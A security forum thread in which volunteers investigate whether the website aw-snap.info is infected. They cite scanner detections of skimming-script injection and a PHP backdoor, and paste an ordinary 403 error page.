Author Topic: aw-snap.info with malware? Redirects to -https://aw-snap.info/403.htm  (Read 860 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32086
  • malware fighter
« Last Edit: December 09, 2019, 07:30:25 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 82437
  • No support PMs thanks
Re: aw-snap.info with malware? Redirects to -https://aw-snap.info/403.htm
« Reply #1 on: December 09, 2019, 10:28:17 PM »
I used to see this a long time ago but with the 404 error (missing file/page/image, etc.). 

The hack was to create a specific malicious 404 error page and edit the normal home page (or any other) inserting a link to a non existent page/image, etc. triggering the malicious 404 page. 

I just wonder if there isn't something similar going on here.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 1909 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 19.8.2393 (build 19.8.4793.544) UI-1.0.415/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ WinPatrol+/

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 36372
  • Weihrauch Airguns
Re: aw-snap.info with malware? Redirects to -https://aw-snap.info/403.htm
« Reply #2 on: December 09, 2019, 10:42:58 PM »
Description: Malicious scripts injected to Magneto (and other e-commerce) site that try to steal pyament details and site credentials from website forms. Typically the hijack login and checkout forms and send entered data to a remote third-party site controled by the attackers. Sometime the script may redirect online shoppers to fake checkout pages.


https://www.virustotal.com/gui/file/b23b9fc160fada7c57050a59485fbdcf50f406c4ba89d8320fd8efeb842f689d/detection



Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32086
  • malware fighter
Re: aw-snap.info with malware? Redirects to -https://aw-snap.info/403.htm
« Reply #3 on: December 09, 2019, 11:01:38 PM »
Script injection malcode, thank you DavidR and Pondus for putting the detection-cherry on the cake.
The proof of the pudding is indeed in the eating, but we had to taste it first...

For the moment I get here with the 403 error
Quote
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
<link href='-http://aw-snap.info/wp-content/redleg_sm.ico' rel='icon' type='image/x-icon'/>
<link rel="shortcut icon" href="-http://aw-snap.info/wp-content/redleg_sm.ico" />
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access / on this server.</p>
<hr>
<address>Apache Server at -aw-snap.info Port 80</address>
</body></html>

VT gives as clean:  -http://aw-snap.info/wp-content/redleg_sm.ico,
somehow the connection is not encrypted and not secure.
So Redleg has some cleansing to do on his own website analysis website  ;D  :(

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32086
  • malware fighter
Re: aw-snap.info with malware? Redirects to -https://aw-snap.info/403.htm
« Reply #4 on: December 10, 2019, 01:36:43 PM »
aw-snap.info still won't open up in my browser: https://urlscan.io/result/4531ae42-1111-491a-b060-42df0288700b/
see: https://urlscan.io/result/4531ae42-1111-491a-b060-42df0288700b/#links
response hrml: https://urlscan.io/result/4531ae42-1111-491a-b060-42df0288700b/#transactions
behavior: https://urlscan.io/result/4531ae42-1111-491a-b060-42df0288700b/#behaviour
Indicators of compromise (around an attack): https://urlscan.io/result/4531ae42-1111-491a-b060-42df0288700b/#iocs
host details: https://www.shodan.io/host/107.180.40.144
Website test results: https://internet.nl/site/aw-snap.info/671442/
1 malicious file detected: https://quttera.com/detailed_report/www.aw-snap.info
File:
Quote

index.html
Severity:   Malicious
Reason:   Detected malicious PHP content
Details:   Detected PHP backdoor
Offset:   3162
Threat dump:   View code  index html - blocked
Threat dump MD5:   0DEAEF3CF103258A26211AB017E008E6
File size[byte]:   10618
File type:   HTML
Page/File MD5:   9818584FD5B51A3DEA390ACD83ADDFE0
Scan duration[sec]:   0.08

pol
« Last Edit: December 10, 2019, 01:54:49 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!